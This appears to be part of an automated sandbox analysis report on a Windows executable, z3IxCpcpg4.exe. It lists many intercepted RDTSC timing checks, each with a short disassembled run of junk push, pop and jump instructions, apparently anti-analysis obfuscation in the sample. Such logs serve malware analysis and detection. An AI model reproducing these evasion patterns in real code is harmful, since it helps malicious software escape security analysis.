Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1146218 second address: 114625A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F83ACE24F32h 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F83ACE24F38h 0x00000010 jmp 00007F83ACE24F32h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 114625A second address: 1146264 instructions: 0x00000000 rdtsc 0x00000002 je 00007F83ACDAA9E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1146EA0 second address: 1146EAA instructions: 0x00000000 rdtsc 0x00000002 jg 00007F83ACE24F26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1146EAA second address: 1146EBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a jo 00007F83ACDAA9E6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1146EBA second address: 1146EC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1146EC0 second address: 1146EC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1146EC6 second address: 1146ED3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F83ACE24F26h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 114D772 second address: 114D776 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1150648 second address: 115064C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 115064C second address: 115066F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F83ACDAA9F3h 0x0000000f jno 00007F83ACDAA9E6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 115066F second address: 115068C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83ACE24F39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 115068C second address: 1150694 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1150694 second address: 115069A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 115069A second address: 11506A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 10C53BB second address: 10C53C1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11502E2 second address: 11502E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11502E6 second address: 11502F0 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F83ACE24F26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11502F0 second address: 11502FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F83ACDAA9E6h 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11502FC second address: 1150320 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F83ACE24F32h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edi 0x0000000e push edi 0x0000000f jp 00007F83ACE24F26h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 10C6ED2 second address: 10C6EDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 10C6EDA second address: 10C6EDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11553B5 second address: 11553BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11553BA second address: 11553C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1155972 second address: 115598C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F83ACDAA9F2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 115598C second address: 1155990 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 115B42F second address: 115B43A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 115B43A second address: 115B440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 115B440 second address: 115B464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F83ACDAA9ECh 0x00000009 popad 0x0000000a jne 00007F83ACDAA9F3h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 115B464 second address: 115B46B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 115A2A6 second address: 115A2DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F83ACDAA9F6h 0x00000009 popad 0x0000000a jp 00007F83ACDAA9F8h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 115A2DC second address: 115A2E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 115A44C second address: 115A452 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 115A452 second address: 115A457 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 115A457 second address: 115A46A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83ACDAA9EDh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 115A46A second address: 115A470 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 115A5B0 second address: 115A5B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 115A5B4 second address: 115A5CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F83ACE24F26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d js 00007F83ACE24F26h 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 115A5CC second address: 115A5D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 115A5D2 second address: 115A5D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 115A5D6 second address: 115A613 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83ACDAA9F7h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push edi 0x0000000d jmp 00007F83ACDAA9F8h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 115E421 second address: 115E427 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 115E427 second address: 115E42B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 115E42B second address: 115E435 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F83ACE24F2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 115E435 second address: 115E44A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push edi 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007F83ACDAA9E6h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 115E0BF second address: 115E0EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jp 00007F83ACE24F3Ch 0x0000000b jmp 00007F83ACE24F34h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 pop edx 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push ecx 0x0000001e pop ecx 0x0000001f push edi 0x00000020 pop edi 0x00000021 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 115E0EF second address: 115E11D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F83ACDAA9EAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c jmp 00007F83ACDAA9F6h 0x00000011 jp 00007F83ACDAA9E6h 0x00000017 pop esi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 115E11D second address: 115E13E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F83ACE24F33h 0x00000008 jne 00007F83ACE24F26h 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 115E13E second address: 115E144 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1165405 second address: 116540F instructions: 0x00000000 rdtsc 0x00000002 js 00007F83ACE24F2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 116540F second address: 116542E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F83ACDAA9F7h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 116542E second address: 1165433 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11634F4 second address: 11634F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11634F8 second address: 11634FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1163671 second address: 1163677 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1163677 second address: 116368D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83ACE24F32h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 116380F second address: 1163833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F83ACDAA9E6h 0x0000000a popad 0x0000000b jmp 00007F83ACDAA9F4h 0x00000010 pushad 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11648EF second address: 11648F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11648F3 second address: 1164903 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007F83ACDAA9E6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1164903 second address: 1164907 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1164907 second address: 116490D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 116490D second address: 1164913 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1164913 second address: 1164917 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1164917 second address: 116491D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 116491D second address: 1164930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jng 00007F83ACDAA9E6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1164930 second address: 1164951 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F83ACE24F26h 0x0000000a popad 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e jmp 00007F83ACE24F2Ch 0x00000013 jnc 00007F83ACE24F26h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1164BCA second address: 1164BDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 js 00007F83ACDAA9E6h 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1164E96 second address: 1164E9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1164E9A second address: 1164EA6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1164EA6 second address: 1164EAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1164EAA second address: 1164EC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F83ACDAA9F1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1165142 second address: 116514E instructions: 0x00000000 rdtsc 0x00000002 jo 00007F83ACE24F26h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 116514E second address: 1165154 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1165154 second address: 116517C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F83ACE24F28h 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 pop eax 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 popad 0x0000001a jno 00007F83ACE24F2Eh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 116517C second address: 1165190 instructions: 0x00000000 rdtsc 0x00000002 je 00007F83ACDAA9ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 116B447 second address: 116B452 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F83ACE24F26h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 116A692 second address: 116A69C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F83ACDAA9E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 116AC02 second address: 116AC08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 116AC08 second address: 116AC0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 116AC0E second address: 116AC12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 116AC12 second address: 116AC2F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F83ACDAA9F4h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 116AEB8 second address: 116AEC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 116AEC2 second address: 116AECB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 116AECB second address: 116AEEC instructions: 0x00000000 rdtsc 0x00000002 jg 00007F83ACE24F2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F83ACE24F2Bh 0x0000000f jns 00007F83ACE24F26h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 116B052 second address: 116B05C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11751F0 second address: 11751F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11751F4 second address: 1175206 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83ACDAA9EEh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1175206 second address: 117520C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1175603 second address: 1175607 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1175607 second address: 117560D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 117560D second address: 117562D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push esi 0x00000006 pop esi 0x00000007 jnl 00007F83ACDAA9E6h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jnc 00007F83ACDAA9E6h 0x00000016 jmp 00007F83ACDAA9EAh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 117562D second address: 1175631 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1175631 second address: 117564F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b jmp 00007F83ACDAA9ECh 0x00000010 jnl 00007F83ACDAA9E6h 0x00000016 pop ecx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1175FE9 second address: 1175FF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop eax 0x00000007 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1175FF0 second address: 1175FFA instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F83ACDAA9F2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 1175FFA second address: 1176000 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\z3IxCpcpg4.exe	RDTSC instruction interceptor: First address: 11767AB second address: 11767C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F83ACDAA9F6h 0x00000009 popad 0x0000000a rdtsc
